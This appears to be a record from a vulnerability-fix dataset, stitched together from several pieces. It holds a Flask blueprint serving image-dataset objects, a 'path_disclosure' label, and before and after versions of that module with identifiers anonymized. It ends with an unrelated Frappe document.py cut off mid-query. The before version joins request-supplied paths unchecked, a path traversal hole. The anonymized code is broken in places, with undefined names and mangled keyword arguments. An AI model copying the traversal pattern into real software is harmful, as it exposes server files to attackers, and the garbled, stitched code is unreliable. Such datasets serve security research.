        # FIX: str.replace returns a new string — the original discarded the
        # result, so URL-encoded ',' and ' ' were never actually decoded.
        classes = classes.replace('%2C', ',').replace('%20', ' ')
        classes_list = classes.split(',')

    def get_class_path():
        # The first index line locates the dataset; class directories sit
        # two levels above the indexed objects.
        with open(mixer_index, 'r') as f:
            dataset_path = f.readline()
        dataset_path = '/'.join(dataset_path.split('/')[:-2])
        class_paths = []
        for c in classes_list:
            class_paths.append(_get_obj_absolute_path(dataset_path + '/' + c.strip()))
        return class_paths

    mixer_list = []
    class_paths = get_class_path()
    _log.info("Class paths : {}".format(class_paths))
    if class_paths:
        for path in class_paths:
            _log.info("Path Exists ? {}".format(os.path.exists(path)))
            sys.stdout.flush()
            file_list = []
            for ext in image_types:
                file_list.extend(glob.glob(os.path.join(path, ext)))
            mixer_list.extend(sorted(file_list))
        mixer_list = [_get_obj_path(l.strip()) for l in mixer_list]
    else:
        # No class filter (or none matched): serve the whole mixer index.
        with open(mixer_index, 'r') as f:
            mixer_list = list(f.readlines())
    return mixer_list
@scope_blueprint.route('/id/<path:object_path>')
def get_object_id(object_path):
    """Serve the <object .../> XML element for a single object."""
    xml = _get_object_element(object_path=object_path)
    return Response(xml, "200 OK",
                    headers=Headers([('Content-Type', 'text/xml')]))
@scope_blueprint.route('/meta/<path:object_path>')
def get_object_meta(object_path):
    """Return JSON metadata for an object (its ground-truth label)."""
    abs_path = _get_obj_absolute_path(object_path)
    attrs = {}
    try:
        # The label is the name of the object's parent directory.
        attrs['_gt_label'] = abs_path.split('/')[-2]
    except IOError:
        pass
    return jsonify(attrs)
def _get_object_element(object_path):
    """Build the <object .../> XML element for one object.

    A meta attribute is included only when a classes.txt file exists two
    directory levels above the object (i.e. labels are available).
    """
    abs_path = _get_obj_absolute_path(object_path)
    parts = [
        'id=' + quoteattr(url_for('.get_object_id', object_path=object_path)),
        'src=' + quoteattr(_get_object_src_uri(object_path)),
    ]
    labels_file = '/'.join(abs_path.split('/')[:-2]) + '/classes.txt'
    if os.path.isfile(labels_file):
        parts.append('meta=' + quoteattr(url_for('.get_object_meta',
                                                 object_path=object_path)))
    return '<object {} />'.format(' '.join(parts))
def _get_object_src_uri(object_path):
    """Return the object's content URI: file:// when serving locally,
    otherwise an HTTP URL routed through this blueprint."""
    if not LOCAL_OBJ_URI:
        return url_for('.get_object_src_http', obj_path=object_path)
    return 'file://' + _get_obj_absolute_path(object_path)
def _get_obj_path(obj_path):
    """Return obj_path relative to DATAROOT.

    FIX: the original used str.replace, which strips EVERY occurrence of
    the DATAROOT string anywhere in the path, not just a leading one;
    only the prefix is removed now.
    """
    prefix = DATAROOT + '/'
    if obj_path.startswith(prefix):
        return obj_path[len(prefix):]
    return obj_path
def _get_obj_absolute_path(obj_path):
    # Join under DATAROOT with traversal protection (CWE-22): safe_join
    # returns None when obj_path tries to escape DATAROOT (e.g. via "..").
    # NOTE(review): callers do not check for None and would fail further
    # downstream (e.g. send_file/split on None) — confirm intended handling.
    return safe_join(DATAROOT, obj_path)
def _get_index_absolute_path(index):
    # Join under INDEXDIR with traversal protection (CWE-22): safe_join
    # returns None when the request-supplied index name tries to escape
    # INDEXDIR. NOTE(review): callers do not check for None — confirm
    # intended handling.
    return safe_join(INDEXDIR, index)
@scope_blueprint.route('/obj/<path:obj_path>')
def get_object_src_http(obj_path):
    """Stream the raw object bytes over HTTP with year-long caching."""
    one_year = datetime.timedelta(days=365).total_seconds()
    # add_etags/conditional let Flask answer 304 Not Modified on its own.
    response = send_file(_get_obj_absolute_path(obj_path),
                         cache_timeout=one_year,
                         add_etags=True,
                         conditional=True)
    response.headers.extend(Headers())
    return response
| path_disclosure | {
"code": [
" return os.path.join(DATAROOT, obj_path)",
" return os.path.join(INDEXDIR, index)"
],
"line_no": [
282,
286
]
} | {
"code": [
"from werkzeug.security import safe_join",
" return safe_join(INDEXDIR, index)"
],
"line_no": [
27,
288
]
} |
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
from opendiamond.dataretriever.test_utils import *
VAR_0 = 'cocktailtest'
VAR_1 = False
VAR_2 = True # if true, return local file VAR_36, otherwise http.
VAR_3 = VAR_4 = None
VAR_5 = int(1e4)
"""
Example cocktail url:
/cocktail/base/FFFFFFFFFFFFFFFF/distrbuted/1of2/ \
mixers/FFFFFFFFFFFFFFFC/VAR_30/d_42_1.0/VAR_14/gull,cardinal
/cocktail/base/"0"/mixers/FFFFFFFFFFFFFFFC/VAR_30/d_42_1.0
/cocktail/base/FFFFFFFFFFFFFFFF/VAR_30/d_42_1.0
"""
def FUNC_0(VAR_6):
global VAR_3, VAR_4 # pylint: disable=global-statement
VAR_3 = '/srv/diamond/STREAM'
VAR_4 = VAR_6.dataroot
VAR_7 = Blueprint('test_store', __name__)
VAR_8 = logging.getLogger(__name__)
@VAR_7.route('/base/<VAR_9>/mixers/<VAR_10>/VAR_30/<VAR_13>')
@VAR_7.route('/base/<VAR_9>/mixers/<VAR_10>/VAR_30/<VAR_13>/' +
'classes/<VAR_14>')
@VAR_7.route('/base/<VAR_9>/mixers/<VAR_10>/VAR_30/<VAR_13>/' +
'classes/<VAR_14>/VAR_15/<int:VAR_15>/VAR_16/<int:VAR_16>')
@VAR_7.route('/base/<VAR_9>/distrbuted/<int:VAR_11>of<int:VAR_12>/' +
'mixers/<VAR_10>/VAR_30/<VAR_13>')
@VAR_7.route('/base/<VAR_9>/distrbuted/<int:VAR_11>of<int:VAR_12>/' +
'mixers/<VAR_10>/VAR_30/<VAR_13>/VAR_14/<VAR_14>')
def FUNC_1(VAR_9, VAR_10=None, VAR_11=1, VAR_12=1, VAR_13=None,
VAR_14=None, VAR_15=0, VAR_16=-1):
VAR_17 = FUNC_4(VAR_10, VAR_14)
VAR_21 = int((VAR_11-1)*(1.0/VAR_12)*len(VAR_17))
VAR_22 = int(VAR_11*(1.0/VAR_12)*len(VAR_17))
mixer_list = VAR_17[VAR_21:VAR_22]
VAR_8.info("Mixer Size {}".format(len(VAR_17)))
sys.stdout.flush()
return FUNC_2(VAR_9, VAR_13, VAR_17, VAR_15, VAR_16)
@VAR_7.route('/base/<VAR_9>/VAR_30/<VAR_13>')
@VAR_7.route('/base/<VAR_9>/VAR_30/<VAR_13>/VAR_15/<int:VAR_15>/VAR_16/<int:VAR_16>')
@VAR_7.route('/base/<VAR_9>/VAR_15/<int:VAR_15>/VAR_16/<int:VAR_16>')
def FUNC_2(VAR_9, VAR_13=None, VAR_17=None, VAR_15=0, VAR_16=-1):
VAR_8.info("Enter Scope baseIdx {}".format(VAR_9))
sys.stdout.flush()
VAR_23 = []
VAR_24 = None
VAR_25 = 0.
if VAR_13:
VAR_24, VAR_25 = FUNC_3(VAR_13)
VAR_26 = VAR_24
if VAR_26 == None:
VAR_26 = random.randrange(10000)
if VAR_9 != "0":
VAR_40 = FUNC_11(VAR_9)
VAR_41, VAR_42 = VAR_40.split('_')
VAR_23 = [VAR_41, str(VAR_26), VAR_42, "{:.2f}".format(VAR_25)]
VAR_40 = '_'.join(VAR_23)
print(VAR_40)
if not os.path.exists(VAR_40):
split_data(VAR_3, VAR_25, VAR_26)
with open(VAR_40, 'r') as f:
VAR_23 = list(f.readlines())
if VAR_15 > 0:
VAR_23 = base_list[VAR_15:]
if VAR_16 > 0:
VAR_48 = len(VAR_23)
if VAR_16 > VAR_48:
VAR_16 = VAR_48
VAR_23 = base_list[:VAR_16]
VAR_43 = len(VAR_23)
VAR_27 = bool(VAR_17 and VAR_23)
if VAR_23:
VAR_43 = len(VAR_23) #base_entries
else:
VAR_43 = len(VAR_17)
VAR_23 = VAR_17.copy()
del VAR_17
random.seed(VAR_24)
VAR_28 = 0
if VAR_27:
random.Random(VAR_24).shuffle(VAR_17)
VAR_28 = int(VAR_25*VAR_43)
total_entries = VAR_43 + VAR_28
def FUNC_13():
yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
if VAR_1:
yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
yield '<objectlist count="{:d}">\n'.format(VAR_43)
VAR_44 = 0
VAR_45 = 0
if VAR_27:
VAR_44 = int(VAR_25 * VAR_5)
VAR_49 = cycle(VAR_17)
VAR_46 = []
def FUNC_15():
random.seed(VAR_24)
return list(map(lambda x: x + VAR_5*VAR_45,
sorted(random.sample(list(range(VAR_5)), VAR_44))))
for count in range(VAR_43):
if not count % VAR_5 and VAR_27:
VAR_46 = FUNC_15()
VAR_45 += 1
if count in VAR_46:
VAR_20 = next(VAR_49).strip()
else:
VAR_20 = VAR_23.pop(0).strip()
yield FUNC_7(VAR_19=VAR_20) + '\n'
yield '</objectlist>\n'
VAR_29 = Headers([('Content-Type', 'text/xml')])
return Response(stream_with_context(FUNC_13()),
status="200 OK",
VAR_29=headers)
def FUNC_3(VAR_13):
VAR_30 = VAR_13.split('_')
VAR_31 = VAR_30[0]
VAR_24 = int(VAR_30[1])
VAR_25 = 0.1
if VAR_31 == 'r':
VAR_24 = None
if len(VAR_30) > 2:
VAR_25 = float(VAR_30[2]) #float(VAR_30[2])/100.
return VAR_24, round(VAR_25, 4)
def FUNC_4(VAR_18, VAR_14=None):
VAR_32 = FUNC_11('GIDIDX' + VAR_18.upper())
VAR_33 = ('*.jpg', '*.JPG', '*.jpeg', '.png')
VAR_34 = []
if VAR_14:
classes.replace('%2C', ',')
VAR_14.replace('%20', ' ')
VAR_34 = VAR_14.split(',')
def FUNC_14():
with open(VAR_32, 'r') as f:
VAR_47 = f.readline()
VAR_47 = '/'.join(VAR_47.split('/')[:-2])
VAR_35 = []
for c in VAR_34:
VAR_35.append(FUNC_10(VAR_47+'/'+c.strip()))
return VAR_35
VAR_17 = []
VAR_35 = FUNC_14()
VAR_8.info("Class paths : {}".format(VAR_35))
if VAR_35:
for VAR_36 in VAR_35:
VAR_8.info("Path Exists ? {}".format(os.path.exists(VAR_36)))
sys.stdout.flush()
VAR_50 = []
for ext in VAR_33:
VAR_50.extend(glob.glob(os.path.join(VAR_36, ext)))
VAR_17.extend(sorted(VAR_50))
VAR_17 = [FUNC_9(l.strip()) for l in VAR_17]
else:
with open(VAR_32, 'r') as f:
VAR_17 = list(f.readlines())
return VAR_17
@VAR_7.route('/id/<VAR_36:VAR_19>')
def FUNC_5(VAR_19):
VAR_29 = Headers([('Content-Type', 'text/xml')])
return Response(FUNC_7(VAR_19=object_path),
"200 OK",
VAR_29=headers)
@VAR_7.route('/meta/<VAR_36:VAR_19>')
def FUNC_6(VAR_19):
VAR_36 = FUNC_10(VAR_19)
VAR_37 = dict()
try:
VAR_37['_gt_label'] = VAR_36.split('/')[-2]
except IOError:
pass
return jsonify(VAR_37)
def FUNC_7(VAR_19):
VAR_36 = FUNC_10(VAR_19)
VAR_38 = '/'.join(VAR_36.split('/')[:-2])+'/VAR_14.txt'
if os.path.isfile(VAR_38):
return '<object id={} src={} meta={} />' \
.format(quoteattr(url_for('.get_object_id', VAR_19=object_path)),
quoteattr(FUNC_8(VAR_19)),
quoteattr(url_for('.get_object_meta', VAR_19=object_path)))
return '<object id={} src={} />' \
.format(quoteattr(url_for('.get_object_id', VAR_19=object_path)),
quoteattr(FUNC_8(VAR_19)))
def FUNC_8(VAR_19):
if VAR_2:
return 'file://' + FUNC_10(VAR_19)
return url_for('.get_object_src_http', VAR_20=VAR_19)
def FUNC_9(VAR_20):
return VAR_20.replace(VAR_4+'/', '')
def FUNC_10(VAR_20):
return os.path.join(VAR_4, VAR_20)
def FUNC_11(VAR_11):
return os.path.join(VAR_3, VAR_11)
@VAR_7.route('/obj/<VAR_36:VAR_20>')
def FUNC_12(VAR_20):
VAR_36 = FUNC_10(VAR_20)
VAR_29 = Headers()
VAR_39 = send_file(VAR_36,
cache_timeout=datetime.timedelta(
days=365).total_seconds(),
add_etags=True,
conditional=True)
VAR_39.headers.extend(VAR_29)
return VAR_39
|
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
from werkzeug.security import safe_join
from opendiamond.dataretriever.test_utils import *
VAR_0 = 'cocktailtest'
VAR_1 = False
VAR_2 = True # if true, return local file VAR_36, otherwise http.
VAR_3 = VAR_4 = None
VAR_5 = int(1e4)
"""
Example cocktail url:
/cocktail/base/FFFFFFFFFFFFFFFF/distrbuted/1of2/ \
mixers/FFFFFFFFFFFFFFFC/VAR_30/d_42_1.0/VAR_14/gull,cardinal
/cocktail/base/"0"/mixers/FFFFFFFFFFFFFFFC/VAR_30/d_42_1.0
/cocktail/base/FFFFFFFFFFFFFFFF/VAR_30/d_42_1.0
"""
def FUNC_0(VAR_6):
global VAR_3, VAR_4 # pylint: disable=global-statement
VAR_3 = '/srv/diamond/STREAM'
VAR_4 = VAR_6.dataroot
VAR_7 = Blueprint('test_store', __name__)
VAR_8 = logging.getLogger(__name__)
@VAR_7.route('/base/<VAR_9>/mixers/<VAR_10>/VAR_30/<VAR_13>')
@VAR_7.route('/base/<VAR_9>/mixers/<VAR_10>/VAR_30/<VAR_13>/' +
'classes/<VAR_14>')
@VAR_7.route('/base/<VAR_9>/mixers/<VAR_10>/VAR_30/<VAR_13>/' +
'classes/<VAR_14>/VAR_15/<int:VAR_15>/VAR_16/<int:VAR_16>')
@VAR_7.route('/base/<VAR_9>/distrbuted/<int:VAR_11>of<int:VAR_12>/' +
'mixers/<VAR_10>/VAR_30/<VAR_13>')
@VAR_7.route('/base/<VAR_9>/distrbuted/<int:VAR_11>of<int:VAR_12>/' +
'mixers/<VAR_10>/VAR_30/<VAR_13>/VAR_14/<VAR_14>')
def FUNC_1(VAR_9, VAR_10=None, VAR_11=1, VAR_12=1, VAR_13=None,
VAR_14=None, VAR_15=0, VAR_16=-1):
VAR_17 = FUNC_4(VAR_10, VAR_14)
VAR_21 = int((VAR_11-1)*(1.0/VAR_12)*len(VAR_17))
VAR_22 = int(VAR_11*(1.0/VAR_12)*len(VAR_17))
mixer_list = VAR_17[VAR_21:VAR_22]
VAR_8.info("Mixer Size {}".format(len(VAR_17)))
sys.stdout.flush()
return FUNC_2(VAR_9, VAR_13, VAR_17, VAR_15, VAR_16)
@VAR_7.route('/base/<VAR_9>/VAR_30/<VAR_13>')
@VAR_7.route('/base/<VAR_9>/VAR_30/<VAR_13>/VAR_15/<int:VAR_15>/VAR_16/<int:VAR_16>')
@VAR_7.route('/base/<VAR_9>/VAR_15/<int:VAR_15>/VAR_16/<int:VAR_16>')
def FUNC_2(VAR_9, VAR_13=None, VAR_17=None, VAR_15=0, VAR_16=-1):
VAR_8.info("Enter Scope baseIdx {}".format(VAR_9))
sys.stdout.flush()
VAR_23 = []
VAR_24 = None
VAR_25 = 0.
if VAR_13:
VAR_24, VAR_25 = FUNC_3(VAR_13)
VAR_26 = VAR_24
if VAR_26 == None:
VAR_26 = random.randrange(10000)
if VAR_9 != "0":
VAR_40 = FUNC_11(VAR_9)
VAR_41, VAR_42 = VAR_40.split('_')
VAR_23 = [VAR_41, str(VAR_26), VAR_42, "{:.2f}".format(VAR_25)]
VAR_40 = '_'.join(VAR_23)
print(VAR_40)
if not os.path.exists(VAR_40):
split_data(VAR_3, VAR_25, VAR_26)
with open(VAR_40, 'r') as f:
VAR_23 = list(f.readlines())
if VAR_15 > 0:
VAR_23 = base_list[VAR_15:]
if VAR_16 > 0:
VAR_48 = len(VAR_23)
if VAR_16 > VAR_48:
VAR_16 = VAR_48
VAR_23 = base_list[:VAR_16]
VAR_43 = len(VAR_23)
VAR_27 = bool(VAR_17 and VAR_23)
if VAR_23:
VAR_43 = len(VAR_23) #base_entries
else:
VAR_43 = len(VAR_17)
VAR_23 = VAR_17.copy()
del VAR_17
random.seed(VAR_24)
VAR_28 = 0
if VAR_27:
random.Random(VAR_24).shuffle(VAR_17)
VAR_28 = int(VAR_25*VAR_43)
total_entries = VAR_43 + VAR_28
def FUNC_13():
yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
if VAR_1:
yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
yield '<objectlist count="{:d}">\n'.format(VAR_43)
VAR_44 = 0
VAR_45 = 0
if VAR_27:
VAR_44 = int(VAR_25 * VAR_5)
VAR_49 = cycle(VAR_17)
VAR_46 = []
def FUNC_15():
random.seed(VAR_24)
return list(map(lambda x: x + VAR_5*VAR_45,
sorted(random.sample(list(range(VAR_5)), VAR_44))))
for count in range(VAR_43):
if not count % VAR_5 and VAR_27:
VAR_46 = FUNC_15()
VAR_45 += 1
if count in VAR_46:
VAR_20 = next(VAR_49).strip()
else:
VAR_20 = VAR_23.pop(0).strip()
yield FUNC_7(VAR_19=VAR_20) + '\n'
yield '</objectlist>\n'
VAR_29 = Headers([('Content-Type', 'text/xml')])
return Response(stream_with_context(FUNC_13()),
status="200 OK",
VAR_29=headers)
def FUNC_3(VAR_13):
VAR_30 = VAR_13.split('_')
VAR_31 = VAR_30[0]
VAR_24 = int(VAR_30[1])
VAR_25 = 0.1
if VAR_31 == 'r':
VAR_24 = None
if len(VAR_30) > 2:
VAR_25 = float(VAR_30[2]) #float(VAR_30[2])/100.
return VAR_24, round(VAR_25, 4)
def FUNC_4(VAR_18, VAR_14=None):
VAR_32 = FUNC_11('GIDIDX' + VAR_18.upper())
VAR_33 = ('*.jpg', '*.JPG', '*.jpeg', '.png')
VAR_34 = []
if VAR_14:
classes.replace('%2C', ',')
VAR_14.replace('%20', ' ')
VAR_34 = VAR_14.split(',')
def FUNC_14():
with open(VAR_32, 'r') as f:
VAR_47 = f.readline()
VAR_47 = '/'.join(VAR_47.split('/')[:-2])
VAR_35 = []
for c in VAR_34:
VAR_35.append(FUNC_10(VAR_47+'/'+c.strip()))
return VAR_35
VAR_17 = []
VAR_35 = FUNC_14()
VAR_8.info("Class paths : {}".format(VAR_35))
if VAR_35:
for VAR_36 in VAR_35:
VAR_8.info("Path Exists ? {}".format(os.path.exists(VAR_36)))
sys.stdout.flush()
VAR_50 = []
for ext in VAR_33:
VAR_50.extend(glob.glob(os.path.join(VAR_36, ext)))
VAR_17.extend(sorted(VAR_50))
VAR_17 = [FUNC_9(l.strip()) for l in VAR_17]
else:
with open(VAR_32, 'r') as f:
VAR_17 = list(f.readlines())
return VAR_17
@VAR_7.route('/id/<VAR_36:VAR_19>')
def FUNC_5(VAR_19):
VAR_29 = Headers([('Content-Type', 'text/xml')])
return Response(FUNC_7(VAR_19=object_path),
"200 OK",
VAR_29=headers)
@VAR_7.route('/meta/<VAR_36:VAR_19>')
def FUNC_6(VAR_19):
VAR_36 = FUNC_10(VAR_19)
VAR_37 = dict()
try:
VAR_37['_gt_label'] = VAR_36.split('/')[-2]
except IOError:
pass
return jsonify(VAR_37)
def FUNC_7(VAR_19):
VAR_36 = FUNC_10(VAR_19)
VAR_38 = '/'.join(VAR_36.split('/')[:-2])+'/VAR_14.txt'
if os.path.isfile(VAR_38):
return '<object id={} src={} meta={} />' \
.format(quoteattr(url_for('.get_object_id', VAR_19=object_path)),
quoteattr(FUNC_8(VAR_19)),
quoteattr(url_for('.get_object_meta', VAR_19=object_path)))
return '<object id={} src={} />' \
.format(quoteattr(url_for('.get_object_id', VAR_19=object_path)),
quoteattr(FUNC_8(VAR_19)))
def FUNC_8(VAR_19):
if VAR_2:
return 'file://' + FUNC_10(VAR_19)
return url_for('.get_object_src_http', VAR_20=VAR_19)
def FUNC_9(VAR_20):
return VAR_20.replace(VAR_4+'/', '')
def FUNC_10(VAR_20):
return safe_join(VAR_4, VAR_20)
def FUNC_11(VAR_11):
return safe_join(VAR_3, VAR_11)
@VAR_7.route('/obj/<VAR_36:VAR_20>')
def FUNC_12(VAR_20):
VAR_36 = FUNC_10(VAR_20)
VAR_29 = Headers()
VAR_39 = send_file(VAR_36,
cache_timeout=datetime.timedelta(
days=365).total_seconds(),
add_etags=True,
conditional=True)
VAR_39.headers.extend(VAR_29)
return VAR_39
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
19,
28,
29,
35,
43,
44,
49,
50,
52,
54,
66,
73,
75,
91,
92,
95,
96,
97,
98,
104,
105,
116,
117,
119,
126,
128,
129,
135,
136,
137,
139,
143,
145,
151,
153,
158,
163,
169,
171,
173,
177,
188,
193,
197,
201,
203,
209,
218,
222,
235,
237,
244,
245,
250,
255,
257,
258,
270,
271,
275,
277,
280,
283,
284,
287,
288,
292,
294,
295,
303,
190,
191,
192,
193,
194,
195,
196,
197,
198,
199
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
19,
28,
30,
31,
37,
45,
46,
51,
52,
54,
56,
68,
75,
77,
93,
94,
97,
98,
99,
100,
106,
107,
118,
119,
121,
128,
130,
131,
137,
138,
139,
141,
145,
147,
153,
155,
160,
165,
171,
173,
175,
179,
190,
195,
199,
203,
205,
211,
220,
224,
237,
239,
246,
247,
252,
257,
259,
260,
272,
273,
277,
279,
282,
285,
286,
289,
290,
294,
296,
297,
305,
192,
193,
194,
195,
196,
197,
198,
199,
200,
201
] |
1CWE-79
| # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals, print_function
import frappe
import time
from frappe import _, msgprint
from frappe.utils import flt, cstr, now, get_datetime_str, file_lock, date_diff
from frappe.model.base_document import BaseDocument, get_controller
from frappe.model.naming import set_new_name
from six import iteritems, string_types
from werkzeug.exceptions import NotFound, Forbidden
import hashlib, json
from frappe.model import optional_fields, table_fields
from frappe.model.workflow import validate_workflow
from frappe.model.workflow import set_workflow_state_on_action
from frappe.utils.global_search import update_global_search
from frappe.integrations.doctype.webhook import run_webhooks
from frappe.desk.form.document_follow import follow_document
from frappe.core.doctype.server_script.server_script_utils import run_server_script_for_doc_event
# once_only validation
# methods
def get_doc(*args, **kwargs):
"""returns a frappe.model.Document object.
:param arg1: Document dict or DocType name.
:param arg2: [optional] document name.
:param for_update: [optional] select document for update.
There are multiple ways to call `get_doc`
# will fetch the latest user object (with child table) from the database
user = get_doc("User", "test@example.com")
# create a new object
user = get_doc({
"doctype":"User"
"email_id": "test@example.com",
"roles: [
{"role": "System Manager"}
]
})
# create new object with keyword arguments
user = get_doc(doctype='User', email_id='test@example.com')
# select a document for update
user = get_doc("User", "test@example.com", for_update=True)
"""
if args:
if isinstance(args[0], BaseDocument):
# already a document
return args[0]
elif isinstance(args[0], string_types):
doctype = args[0]
elif isinstance(args[0], dict):
# passed a dict
kwargs = args[0]
else:
raise ValueError('First non keyword argument must be a string or dict')
if len(args) < 2 and kwargs:
if 'doctype' in kwargs:
doctype = kwargs['doctype']
else:
raise ValueError('"doctype" is a required key')
controller = get_controller(doctype)
if controller:
return controller(*args, **kwargs)
raise ImportError(doctype)
class Document(BaseDocument):
"""All controllers inherit from `Document`."""
def __init__(self, *args, **kwargs):
"""Constructor.
:param arg1: DocType name as string or document **dict**
:param arg2: Document name, if `arg1` is DocType name.
If DocType name and document name are passed, the object will load
all values (including child documents) from the database.
"""
self.doctype = self.name = None
self._default_new_docs = {}
self.flags = frappe._dict()
if args and args[0] and isinstance(args[0], string_types):
# first arugment is doctype
if len(args)==1:
# single
self.doctype = self.name = args[0]
else:
self.doctype = args[0]
if isinstance(args[1], dict):
# filter
self.name = frappe.db.get_value(args[0], args[1], "name")
if self.name is None:
frappe.throw(_("{0} {1} not found").format(_(args[0]), args[1]),
frappe.DoesNotExistError)
else:
self.name = args[1]
if 'for_update' in kwargs:
self.flags.for_update = kwargs.get('for_update')
self.load_from_db()
return
if args and args[0] and isinstance(args[0], dict):
# first argument is a dict
kwargs = args[0]
if kwargs:
# init base document
super(Document, self).__init__(kwargs)
self.init_valid_columns()
else:
# incorrect arguments. let's not proceed.
raise ValueError('Illegal arguments')
@staticmethod
def whitelist(f):
"""Decorator: Whitelist method to be called remotely via REST API."""
f.whitelisted = True
return f
def reload(self):
"""Reload document from database"""
self.load_from_db()
def load_from_db(self):
"""Load document and children from database and create properties
from fields"""
if not getattr(self, "_metaclass", False) and self.meta.issingle:
single_doc = frappe.db.get_singles_dict(self.doctype)
if not single_doc:
single_doc = frappe.new_doc(self.doctype).as_dict()
single_doc["name"] = self.doctype
del single_doc["__islocal"]
super(Document, self).__init__(single_doc)
self.init_valid_columns()
self._fix_numeric_types()
else:
d = frappe.db.get_value(self.doctype, self.name, "*", as_dict=1, for_update=self.flags.for_update)
if not d:
frappe.throw(_("{0} {1} not found").format(_(self.doctype), self.name), frappe.DoesNotExistError)
super(Document, self).__init__(d)
if self.name=="DocType" and self.doctype=="DocType":
from frappe.model.meta import DOCTYPE_TABLE_FIELDS
table_fields = DOCTYPE_TABLE_FIELDS
else:
table_fields = self.meta.get_table_fields()
for df in table_fields:
children = frappe.db.get_values(df.options,
{"parent": self.name, "parenttype": self.doctype, "parentfield": df.fieldname},
"*", as_dict=True, order_by="idx asc")
if children:
self.set(df.fieldname, children)
else:
self.set(df.fieldname, [])
# sometimes __setup__ can depend on child values, hence calling again at the end
if hasattr(self, "__setup__"):
self.__setup__()
def get_latest(self):
if not getattr(self, "latest", None):
self.latest = frappe.get_doc(self.doctype, self.name)
return self.latest
def check_permission(self, permtype='read', permlevel=None):
"""Raise `frappe.PermissionError` if not permitted"""
if not self.has_permission(permtype):
self.raise_no_permission_to(permlevel or permtype)
def has_permission(self, permtype="read", verbose=False):
"""Call `frappe.has_permission` if `self.flags.ignore_permissions`
is not set.
:param permtype: one of `read`, `write`, `submit`, `cancel`, `delete`"""
if self.flags.ignore_permissions:
return True
return frappe.has_permission(self.doctype, permtype, self, verbose=verbose)
def raise_no_permission_to(self, perm_type):
"""Raise `frappe.PermissionError`."""
frappe.flags.error_message = _('Insufficient Permission for {0}').format(self.doctype)
raise frappe.PermissionError
def insert(self, ignore_permissions=None, ignore_links=None, ignore_if_duplicate=False,
ignore_mandatory=None, set_name=None, set_child_names=True):
"""Insert the document in the database (as a new document).
This will check for user permissions and execute `before_insert`,
`validate`, `on_update`, `after_insert` methods if they are written.
:param ignore_permissions: Do not check permissions if True."""
if self.flags.in_print:
return
self.flags.notifications_executed = []
if ignore_permissions!=None:
self.flags.ignore_permissions = ignore_permissions
if ignore_links!=None:
self.flags.ignore_links = ignore_links
if ignore_mandatory!=None:
self.flags.ignore_mandatory = ignore_mandatory
self.set("__islocal", True)
self.check_permission("create")
self._set_defaults()
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.run_method("before_insert")
self._validate_links()
self.set_new_name(set_name=set_name, set_child_names=set_child_names)
self.set_parent_in_children()
self.validate_higher_perm_levels()
self.flags.in_insert = True
self.run_before_save_methods()
self._validate()
self.set_docstatus()
self.flags.in_insert = False
# run validate, on update etc.
# parent
if getattr(self.meta, "issingle", 0):
self.update_single(self.get_valid_dict())
else:
try:
self.db_insert()
except frappe.DuplicateEntryError as e:
if not ignore_if_duplicate:
raise e
# children
for d in self.get_all_children():
d.db_insert()
self.run_method("after_insert")
self.flags.in_insert = True
if self.get("amended_from"):
self.copy_attachments_from_amended_from()
# flag to prevent creation of event update log for create and update both
# during document creation
self.flags.update_log_for_doc_creation = True
self.run_post_save_methods()
self.flags.in_insert = False
# delete __islocal
if hasattr(self, "__islocal"):
delattr(self, "__islocal")
# clear unsaved flag
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
if not (frappe.flags.in_migrate or frappe.local.flags.in_install or frappe.flags.in_setup_wizard):
follow_document(self.doctype, self.name, frappe.session.user)
return self
def save(self, *args, **kwargs):
"""Wrapper for _save"""
return self._save(*args, **kwargs)
def _save(self, ignore_permissions=None, ignore_version=None):
"""Save the current document in the database in the **DocType**'s table or
`tabSingles` (for single types).
This will check for user permissions and execute
`validate` before updating, `on_update` after updating triggers.
:param ignore_permissions: Do not check permissions if True.
:param ignore_version: Do not save version if True."""
if self.flags.in_print:
return
self.flags.notifications_executed = []
if ignore_permissions!=None:
self.flags.ignore_permissions = ignore_permissions
self.flags.ignore_version = frappe.flags.in_test if ignore_version is None else ignore_version
if self.get("__islocal") or not self.get("name"):
self.insert()
return
self.check_permission("write", "save")
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.set_parent_in_children()
self.set_name_in_children()
self.validate_higher_perm_levels()
self._validate_links()
self.run_before_save_methods()
if self._action != "cancel":
self._validate()
if self._action == "update_after_submit":
self.validate_update_after_submit()
self.set_docstatus()
# parent
if self.meta.issingle:
self.update_single(self.get_valid_dict())
else:
self.db_update()
self.update_children()
self.run_post_save_methods()
# clear unsaved flag
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
return self
def copy_attachments_from_amended_from(self):
"""Copy attachments from `amended_from`"""
from frappe.desk.form.load import get_attachments
#loop through attachments
for attach_item in get_attachments(self.doctype, self.amended_from):
#save attachments to new doc
_file = frappe.get_doc({
"doctype": "File",
"file_url": attach_item.file_url,
"file_name": attach_item.file_name,
"attached_to_name": self.name,
"attached_to_doctype": self.doctype,
"folder": "Home/Attachments"})
_file.save()
def update_children(self):
"""update child tables"""
for df in self.meta.get_table_fields():
self.update_child_table(df.fieldname, df)
def update_child_table(self, fieldname, df=None):
"""sync child table for given fieldname"""
rows = []
if not df:
df = self.meta.get_field(fieldname)
for d in self.get(df.fieldname):
d.db_update()
rows.append(d.name)
if df.options in (self.flags.ignore_children_type or []):
# do not delete rows for this because of flags
# hack for docperm :(
return
if rows:
# select rows that do not match the ones in the document
deleted_rows = frappe.db.sql("""select name from `tab{0}` where parent=%s
and parenttype=%s and parentfield=%s
